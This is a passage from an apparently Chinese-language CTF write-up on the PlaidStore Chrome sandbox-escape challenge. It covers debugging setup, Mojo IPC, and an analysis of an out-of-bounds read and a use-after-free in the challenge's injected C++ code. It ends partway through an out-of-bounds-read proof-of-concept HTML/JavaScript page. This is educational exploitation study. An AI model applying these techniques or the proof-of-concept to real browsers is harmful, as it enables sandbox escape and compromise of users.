0x7f95373c7520 (/usr/lib/x86_64-linux-gnu/libpthread-2.29.so+0x1351f)</span></span><br><span class="line"><span class="comment">#4 0x7f953512ff61 gsignal</span></span><br><span class="line"><span class="comment">#5 0x7f953511b535 abort</span></span><br><span class="line"><span class="comment">#6 0x560df69dd075 base::debug::BreakDebugger()</span></span><br><span class="line"><span class="comment">#7 0x560df6954914 logging::LogMessage::~LogMessage()</span></span><br><span class="line"><span class="comment">#8 0x560df824a22e service_manager::ZygoteHostImpl::Init()</span></span><br><span class="line"><span class="comment">#9 0x560df652ad37 content::ContentMainRunnerImpl::Initialize()</span></span><br><span class="line"><span class="comment">#10 0x560df657965a service_manager::Main()</span></span><br><span class="line"><span class="comment">#11 0x560df6529351 content::ContentMain()</span></span><br><span class="line"><span class="comment">#12 0x560df657849d headless::(anonymous namespace)::RunContentMain()</span></span><br><span class="line"><span class="comment">#13 0x560df657819b headless::HeadlessShellMain()</span></span><br><span class="line"><span class="comment">#14 0x560df3feac27 ChromeMain</span></span><br><span class="line"><span class="comment">#15 0x7f953511cbbb __libc_start_main</span></span><br><span class="line"><span class="comment">#16 0x560df3feaa6a _start</span></span><br><span class="line">  r8: 0000000000000000  r9: 00007ffcf028b6e0 r10: 0000000000000008 r11: 0000000000000246</span><br><span class="line"> r12: 00007ffcf028c9a8 r13: 00007ffcf028b980 r14: 00007ffcf028c9b0 r15: aaaaaaaaaaaaaaaa</span><br><span class="line">  di: 0000000000000002  si: 00007ffcf028b6e0  bp: 00007ffcf028b930  bx: 00007ffcf028b9a4</span><br><span class="line">  dx: 0000000000000000  ax: 0000000000000000  cx: 00007f953512ff61  sp: 00007ffcf028b6e0</span><br><span class="line">  ip: 00007f953512ff61 efl: 0000000000000246 cgf: 002b000000000033 erf: 0000000000000000</span><br><span class="line"> trp: 0000000000000000 msk: 0000000000000000 cr2: 0000000000000000</span><br><span class="line">[end of stack trace]</span><br><span class="line">Calling _exit(1). Core file will not be generated.</span><br></pre></td></tr></table></figure><p>需要执行以下命令，以启用非特权用户命名空间 - <a href="https://github.com/puppeteer/puppeteer/blob/main/docs/troubleshooting.md#setting-up-chrome-linux-sandbox">sandbox问题参考</a></p><blockquote><p>linux命名空间是一种轻量级的虚拟化手段 - <a href="https://www.cnblogs.com/long123king/p/3535462.html">参考</a></p></blockquote><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> sysctl -w kernel.unprivileged_userns_clone=1</span><br></pre></td></tr></table></figure><p>之后即可正常运行chrome</p></li><li><p>调试浏览器时，最好在本地开一个web服务，<strong>而不是让浏览器直接访问本地html文件</strong>，因为这其中<strong>访问的协议是不一样的</strong>。浏览器访问web服务的协议是<code>http</code>，而访问本地文件的协议是<code>file</code>。</p><p>调试时尽量架设本地服务器来避免file协议与http协议实现过程中的某些差异，例如某些API的差异、跨域请求的差异等。</p><p>我们在这里可以使用python自带的httpServer来启动一个web服务</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -m http.server 8000</span><br></pre></td></tr></table></figure></li><li><p>使用<code>gdb script</code>来调试chrome</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># gdbinit</span></span><br><span class="line"><span class="comment"># 读取符号</span></span><br><span class="line">file ./chrome</span><br><span class="line"><span class="comment"># 设置启动参数</span></span><br><span class="line"><span class="built_in">set</span> args --headless --disable-gpu --remote-debugging-port=1338 --user-data-dir=./userdata --enable-blink-features=MojoJS http://localhost:8000/test.html</span><br><span class="line"><span class="comment"># 设置执行fork后继续调试父进程</span></span><br><span class="line"><span class="built_in">set</span> follow-fork-mode parent</span><br></pre></td></tr></table></figure><p>之后运行以下命令即可启动调试。</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gdb -x gidbinit</span><br></pre></td></tr></table></figure></li></ul><h2 id="3-Mojo简介">3. Mojo简介</h2><ul><li><p>Chrome安全体系架构的关键支撑就是沙箱。Chrome将网络的大部分攻击面（例如：DOM渲染、脚本执行、媒体解码等）限制在沙箱进程中。同时，存在一个中央进程，称之为浏览器进程，该进程可以完全不带沙箱运行。而Chrome的数个进程需要相互通信以完成工作协调，而这就涉及到了<strong>进程间或进程内的模块间通信</strong>（<code>IPC,Inter-Process Communication</code>）其中，Mojo是Chromium提供的用于IPC的一种机制。</p></li><li><p>在Chrome中，Mojo机制使用C++实现。但Mojo仍然提供针对C++和JS语言的调用接口。</p></li><li><p>我们可以通过启用MojoJS blink绑定（在Chrome命令行中使用<code>--enable-blink-features=MojoJS</code>）来模拟一个渲染器进程。这些绑定将Mojo平台直接暴露给JavaScript，从而使我们可以完全绕过Blink绑定，直接使用JS来调用Mojo平台中的代码。</p><blockquote><p>可以简单的理解为，Mojo的JS接口通过<code>--enable-blink-features=MojoJS</code>参数打开，这样外部JS代码可以直接调用Mojo的JS接口，降低漏洞利用难点。</p></blockquote></li><li><p>更多信息可以阅读<a href="https://chromium.googlesource.com/chromium/src.git/+/master/mojo/README.md">Mojo Docs</a></p></li></ul><h2 id="4-漏洞分析">4. 漏洞分析</h2><blockquote><p>注意！在阅读漏洞分析前，请先详细阅读</p><ul><li><p><a href="https://www.jianshu.com/p/ce068f112945">Mojo &amp; Services 简介</a></p></li><li><p><a href="https://blog.csdn.net/tornmy/article/details/82748058">chromium mojo 快速入门</a></p></li><li><p><strong>重要！</strong> <strong><a href="https://blog.wuhao13.xin/1001.html">利用Mojo IPC的UAF漏洞实现Chrome浏览器沙箱逃逸</a></strong></p></li></ul><blockquote><p>该文的翻译不是很到位，建议直接阅读<a href="https://theori.io/research/escaping-chrome-sandbox/">原文</a></p></blockquote><p>并理解其中<strong>关于Mojo的更多详细信息</strong>以及<strong>指针生命周期的漏洞问题</strong>。该题基于上述文章中的漏洞改编而成。</p></blockquote><h3 id="a-代码提取">a. 代码提取</h3><blockquote><p>该题给出了一个<code>plaidstore.diff</code>文件。而这个diff文件向我们展示了新声明的Mojo接口。我们需要通过调用对应的MojoJS接口来利用其中的漏洞。</p></blockquote><p>在<code>plaidstore.diff</code>文件中可以看出，该版本实现了一个新接口<code>PlaidStore</code>。将相关代码从中剥离整理出，可分为三类：</p><ul><li><p>一部分代码是在原Chrome代码中添加的代码片段。</p><p>搜索可得，在<code>PopulateFrameBinders</code>函数中，该题新增了一个回调函数 - <a href="https://source.chromium.org/chromium/chromium/src/+/master:content/browser/browser_interface_binders.cc;l=743;bpv=0;bpt=1">源码</a></p><blockquote><p>通过<code>chrome</code>代码交叉引用查询可得，调用层次为</p><p><code>BrowserInterfaceBrokerImpl::PopulateBinderMap</code> -&gt; <code>PopulateBinderMap</code> -&gt; <code>PopulateFrameBinders</code></p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">PopulateFrameBinders</span><span class="params">(RenderFrameHostImpl* host, mojo::BinderMap* map)</span> </span>&#123;</span><br><span class="line">  <span class="comment">//....</span></span><br><span class="line">    <span class="comment">// 新添加的内容</span></span><br><span class="line">    map-&gt;<span class="built_in">Add</span>&lt;blink::mojom::PlaidStore&gt;(</span><br><span class="line">      base::<span class="built_in">BindRepeating</span>(&amp;RenderFrameHostImpl::CreatePlaidStore,</span><br><span class="line">                          base::<span class="built_in">Unretained</span>(host)));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">RenderFrameHostImpl::CreatePlaidStore</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt; receiver)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    PlaidStoreImpl::<span class="built_in">Create</span>(<span class="keyword">this</span>, std::<span class="built_in">move</span>(receiver));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>再一部分代码是mojo特有的接口文件，届时将会根据此文件生成对应接口<code>xx</code>。而该接口的实际实现是<code>xxImpl</code>。</p><p>例如，下面定义的接口为<code>PlaidStore</code>，但C++中实际实现为<code>PlaidStoreImpl</code>类</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// PlaidStore.mojom文件</span></span><br><span class="line"><span class="keyword">module</span> blink.mojom;</span><br><span class="line"></span><br><span class="line"><span class="comment">// This interface provides a data store</span></span><br><span class="line">interface PlaidStore</span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Stores data in the data store</span></span><br><span class="line">    <span class="built_in">StoreData</span>(string key, array&lt;uint8&gt; data);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Gets data from the data store</span></span><br><span class="line">    <span class="built_in">GetData</span>(string key, uint32 count) = &gt; (array&lt;uint8&gt; data);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>最后一部分代码是声明的<code>PlaidStore</code>接口所对应的C++实现<code>PlaidStoreImpl</code>类</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">namespace</span> content</span><br><span class="line">&#123;</span><br><span class="line">    PlaidStoreImpl::<span class="built_in">PlaidStoreImpl</span>(</span><br><span class="line">        RenderFrameHost *render_frame_host)</span><br><span class="line">        : <span class="built_in">render_frame_host_</span>(render_frame_host) &#123;&#125;</span><br><span class="line"></span><br><span class="line">    PlaidStoreImpl::~<span class="built_in">PlaidStoreImpl</span>() &#123;&#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::StoreData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">const</span> std::vector&lt;<span class="type">uint8_t</span>&gt; &amp;data)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (!render_frame_host_-&gt;<span class="built_in">IsRenderFrameLive</span>())</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        data_store_[key] = data;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::GetData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">uint32_t</span> count,</span></span></span><br><span class="line"><span class="params"><span class="function">        GetDataCallback callback)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (!render_frame_host_-&gt;<span class="built_in">IsRenderFrameLive</span>())</span><br><span class="line">        &#123;</span><br><span class="line">            std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(&#123;&#125;);</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">auto</span> it = data_store_.<span class="built_in">find</span>(key);</span><br><span class="line">        <span class="keyword">if</span> (it == data_store_.<span class="built_in">end</span>())</span><br><span class="line">        &#123;</span><br><span class="line">            std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(&#123;&#125;);</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="function">std::vector&lt;<span class="type">uint8_t</span>&gt; <span class="title">result</span><span class="params">(it-&gt;second.begin(), it-&gt;second.begin() count)</span></span>;</span><br><span class="line">        std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(result);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// static</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::Create</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        RenderFrameHost *render_frame_host,</span></span></span><br><span class="line"><span class="params"><span class="function">        mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt; receiver)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        mojo::<span class="built_in">MakeSelfOwnedReceiver</span>(std::<span class="built_in">make_unique</span>&lt;PlaidStoreImpl&gt;(render_frame_host),</span><br><span class="line">                                    std::<span class="built_in">move</span>(receiver));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125; <span class="comment">// namespace content</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> content</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">class</span> <span class="title class_">RenderFrameHost</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">class</span> <span class="title class_">PlaidStoreImpl</span> : <span class="keyword">public</span> blink::mojom::PlaidStore</span><br><span class="line">    &#123;</span><br><span class="line">    <span class="keyword">public</span>:</span><br><span class="line">        <span class="function"><span class="keyword">explicit</span> <span class="title">PlaidStoreImpl</span><span class="params">(RenderFrameHost *render_frame_host)</span></span>;</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">Create</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">            RenderFrameHost *render_frame_host,</span></span></span><br><span class="line"><span class="params"><span class="function">            mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt; receiver)</span></span>;</span><br><span class="line"></span><br><span class="line">        ~<span class="built_in">PlaidStoreImpl</span>() <span class="keyword">override</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// PlaidStore overrides:</span></span><br><span class="line">        <span class="function"><span class="type">void</span> <span class="title">StoreData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">            <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">            <span class="type">const</span> std::vector&lt;<span class="type">uint8_t</span>&gt; &amp;data)</span> <span class="keyword">override</span></span>;</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="type">void</span> <span class="title">GetData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">            <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">            <span class="type">uint32_t</span> count,</span></span></span><br><span class="line"><span class="params"><span class="function">            GetDataCallback callback)</span> <span class="keyword">override</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span>:</span><br><span class="line">        <span class="comment">// 注意这里的`render_frame_host_`</span></span><br><span class="line">        RenderFrameHost *render_frame_host_;</span><br><span class="line">        std::map&lt;std::string, std::vector&lt;<span class="type">uint8_t</span>&gt;&gt; data_store_;</span><br><span class="line">  &#125;;</span><br><span class="line">&#125; <span class="comment">// namespace content</span></span><br></pre></td></tr></table></figure></li></ul><h3 id="b-OOB漏洞">b. OOB漏洞</h3><blockquote><p>OOB（Out Of Bound）是<strong>信息外带漏洞</strong>，例如越界读取等都属于OOB漏洞。</p></blockquote><p>在函数<code>PlaidStoreImpl::GetData</code>中，程序并没有对传入的参数<code>count</code>进行判断，因此该函数可以越界读取，返回比实际存储范围更大的数据。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::GetData</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">      <span class="type">const</span> std::string &amp;key,</span></span></span><br><span class="line"><span class="params"><span class="function">      <span class="type">uint32_t</span> count,</span></span></span><br><span class="line"><span class="params"><span class="function">      GetDataCallback callback)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (!render_frame_host_-&gt;<span class="built_in">IsRenderFrameLive</span>())</span><br><span class="line">    &#123;</span><br><span class="line">        std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(&#123;&#125;);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">auto</span> it = data_store_.<span class="built_in">find</span>(key);</span><br><span class="line">    <span class="keyword">if</span> (it == data_store_.<span class="built_in">end</span>())</span><br><span class="line">    &#123;</span><br><span class="line">        std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(&#123;&#125;);</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 将传入的count作为数据的获取量，返回count单位的数据</span></span><br><span class="line">    <span class="function">std::vector&lt;<span class="type">uint8_t</span>&gt; <span class="title">result</span><span class="params">(it-&gt;second.begin(), it-&gt;second.begin() count)</span></span>;</span><br><span class="line">    std::<span class="built_in">move</span>(callback).<span class="built_in">Run</span>(result);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="c-UAF漏洞">c. UAF漏洞</h3><ul><li><p>当<code>PlaidStoreImpl</code>类执行构造函数时，该类的一个实例将会<strong>保存</strong>传入的<code>render_frame_host</code><strong>原始指针</strong>。（注意保留的是<strong>原始</strong>指针<strong>而不是智能指针</strong>）</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PlaidStoreImpl::<span class="built_in">PlaidStoreImpl</span>(</span><br><span class="line">        RenderFrameHost *render_frame_host)</span><br><span class="line">        : <span class="built_in">render_frame_host_</span>(render_frame_host) &#123;&#125;</span><br></pre></td></tr></table></figure></li><li><p>而<code>PlaidStoreImpl::Create</code>函数内部会调用<code>mojo::MakeSelfOwnedReceiver</code>函数。该函数将会把Mojo管道的一端<code>Receiver</code>与当前<code>PlaidStoreImpl</code>实例关联（注意传入的<code>render_frame_host</code>使用的 <strong><code>unique</code>智能指针类型为<code>PlaidStoreImpl</code></strong>）。这样，当Mojo管道关闭或者发生错误，<code>recevier</code>便可将当前<code>PlaidStoreImpl</code>实例释放。如此便达到了关联<code>PlaidStoreImpl</code>生命周期的目的。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// static</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">PlaidStoreImpl::Create</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    RenderFrameHost *render_frame_host,</span></span></span><br><span class="line"><span class="params"><span class="function">    mojo::PendingReceiver&lt;blink::mojom::PlaidStore&gt; receiver)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    mojo::<span class="built_in">MakeSelfOwnedReceiver</span>(std::<span class="built_in">make_unique</span>&lt;PlaidStoreImpl&gt;(render_frame_host),</span><br><span class="line">                                std::<span class="built_in">move</span>(receiver));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但是，<code>render_frame_host</code>并没有与当前<code>PlaidStoreImpl</code>实例关联。也就是说若<code>render_frame_host</code>被析构，当前<code>PlaidStoreImpl</code>实例将仍然存在。</p><blockquote><p>一个<code>render</code>进程中的<code>RenderFrame</code>对应<code>browser</code>进程中的<code>RenderFrameHost</code>。</p><p>当打开新的tab或iframe时，<code>browser</code>将会对应的创建<code>RenderFrameHost</code>对象</p><p>释放也是如此，<strong>当某个tab或iframe被释放时，对应的<code>RenderFrameHost</code>对象将会被释放</strong>。</p><p>参考：<a href="https://blog.csdn.net/luoshengyang/article/details/50450100?biz_id=102&amp;utm_term=renderFrameHost&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-50450100&amp;spm=1018.2118.3001.4187">Chromium网页Frame Tree创建过程分析</a></p></blockquote><p>这样，我们可以在保证<code>Mojo Pipe</code>不断开的前提下，将<code>render_frame_host</code>析构，之后就可以在<code>PlaidStoreImpl</code>类函数中继续使用<code>render_frame_host</code>，以达到UAF的目的。</p><blockquote><p>总结：</p><ol><li><p>若关闭Mojo管道，则<code>PlaidStoreImpl</code>实例将会被析构；</p></li><li><p>若析构<code>render_frame_host</code>，则对应<code>PlaidStoreImpl</code>实例将仍然存在。</p></li></ol></blockquote></li></ul><h2 id="5-调试与利用过程">5. 调试与利用过程</h2><h3 id="a-OOB">a. OOB</h3><ul><li><p>我们先写一段OOB POC，看看会泄露出什么信息。</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 调用MojoJS接口时一定要将这些js包含入html中 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">dec2hex</span>(<span class="params">dec</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + dec.<span class="title function_">toString</span>(<span class="number">16</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">bytes2DWORD</span>(<span class="params">bytes</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> value = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">8</span>; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">            value = value * <span class="number">0x100</span> + bytes[<span class="number">7</span> - i];</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> value;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">success</span>(<span class="params">msg</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[+] &#x27;</span> + msg);</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">document</span>.<span class="property">body</span>.<span class="property">innerText</span> += <span class="string">&#x27;[+] &#x27;</span> + msg + <span class="string">&#x27;\n&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// OOB漏洞测试</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">oob</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;OOB&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// 获取plaidStore实例</span></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> plaidStorePtr = <span class="keyword">new</span> blink.<span class="property">mojom</span>.<span class="title class_">PlaidStorePtr</span>();</span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// 将plaidStore实例与mojo pipe绑定</span></span></span><br><span class="line"><span class="language-javascript">        <span class="title class_">Mojo</span>.<span class="title function_">bindInterface</span>(</span></span><br><span class="line"><span class="language-javascript">            blink.<span class="property">mojom</span>.<span class="property">PlaidStore</span>.<span class="property">name</span>,            <span class="comment">// interfaceName</span></span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// 建立mojo pipe，并返回该管道的handle</span></span></span><br><span class="line"><span class="language-javascript">            mojo.<span class="title function_">makeRequest</span>(plaidStorePtr).<span class="property">handle</span>, <span class="comment">// request_handle</span></span></span><br><span class="line"><span class="language-javascript">            <span class="string">&quot;context&quot;</span>,                              <span class="comment">// scope</span></span></span><br><span class="line"><span class="language-javascript">            <span class="literal">true</span>);                                  <span class="comment">// userBroserInterfaceBroker</span></span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// plaidStore中存储的是int8类型的值。本次填充0x10个元素</span></span></span><br><span class="line"><span class="language-javascript">        plaidStorePtr.<span class="title function_">storeData</span>(<span class="string">&quot;aaaa&quot;</span>, [<span class="number">0x31</span>, <span class="number">0x32</span>, <span class="number">0x33</span>, <span class="number">0x34</span>, <span class="number">0x35</span>, <span class="number">0x36</span>, <span class="number">0x37</span>, <span class="number">0x38</span>,</span></span><br><span class="line"><span class="language-javascript">            <span class="number">0x41</span>, <span class="number">0x42</span>, <span class="number">0x43</span>, <span class="number">0x44</span>, <span class="number">0x45</span>, <span class="number">0x46</span>, <span class="number">0x47</span>, <span class="number">0x48</span>]);</span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// getData接口返回Promise对象，需要获取其中的PromiseValue</span></span></span><br><span class="line"><span class="language-javascript">        plaidStorePtr.<span class="title function_">getData</span>(<span class="string">&quot;aaaa&quot;</span>, <span class="number">0x18</span>).<span class="title function_">then</span>(<span class="function"><span class="params">res</span> =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// 返回的数组元素是int8类型</span></span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// 对数组使用slice函数，取数组的第0x20至0x50个的元素</span></span></span><br><span class="line"><span class="language-javascript">            <span class="title 